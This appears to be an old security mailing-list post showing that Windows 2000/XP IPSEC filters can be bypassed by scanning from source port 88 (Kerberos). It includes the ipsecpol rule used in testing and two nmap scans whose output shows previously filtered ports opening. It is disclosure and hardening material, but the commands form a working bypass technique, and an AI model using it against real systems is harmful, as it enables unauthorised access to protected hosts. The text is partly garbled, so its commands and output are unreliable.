Hi folks, ??? As a result of recent a Windows host hardening engagement looking at, I came across this little trick and thought it might be useful at some point. The Microsoft IPSEC filters used by Windows 2000 & XP can be bypassed by choosing a source port of 88 (Kerberos) .First off, Microsoft themselves state that IPSEC filters are not designed as a full featured host based firewall [1] and it is already known that certain types of traffic are exempt from IPSEC filters [2] and they can be summarised as: * Broadcast * Multicast * RSVP * IKE * KerberosIn a Microsoft support note [2] there is the line: "The Kerberos exemption is basically this: If a packet is TCP or UDP and has a source or destination port = 88, permit. "The test host" rule created Using: ipsecpol.exe -x -w reg -p "the black knight" -r "noneshallpass" -n block -f0 =
* :: * Normal NMAP Scan: # nmap -ss -v -v -p0 --initial_rtt_timeout 10 --max_rtt_timeout 20 172.25.0.14starting NMAP 3.50 (http://www.insecure.org/nmap/) AT 2004-05 -19 18:14 BST HOST 172.25.0.14 APPEARS TO BE UP ... Good. Initiating Syn Stealth Scan Against 172.25.0.14 At 18:14 The Syn Stealth Scan Took 7 Seconds To Scan 1659 Ports. Interesting Ports on 172.25.0.14: (The 1658 ports scanned but not shown below are in state: filtered)? PORT ?? STATE SERVICE88 / tcp closed kerberos-secNmap run completed - 1 IP address (1 host up) scanned in 7.017 secondsPort 88 closed is the hint, Nmap Again Using this Source Port: # nmap -ss -v -v -p0 -g 88 --initial_rtt_timeout 10 --MAX_RTT_TIMEOUT 20 172.25.0.14Starting NMAP 3.50 (http://www.insecure.org/nmap/) AT 2004- 05-19 18:14 bst host 172.25.0.14 Appears to be up ... good. Initiating Syn Stealth Scan Against 172.25.0.14 At 18:14 Adding Open Port 445 / TCP Adding Open Port 135 / TCP Adding Open Port 139 / TCP Adding Open Port 1433 / TCP Adding Open Port 1027 / T cp Adding open port 1025 / tcp The SYN Stealth Scan took 0 seconds to scan 1659 ports Interesting ports on 172.25.0.14:. (The 1653 ports scanned but not shown below are in state: closed) PORT ???? STATE SERVICE135 / tcp ? Open? MSRPC139 / TCP? OPEN? NetBIOS-SSN445 / TCP? OPEN? Microsoft-DS1025 / TCP OPEN? NFS-OR-IIS1027 / TCP OPEN? IIS1433 / TCP OPEN? MS-SQL-SNMAP Run Completed - 1 IP Address (1 host up) Scanned in 0.367 Secondsas Can Be Seen, The IPsec Filters Are Byparassed. ??
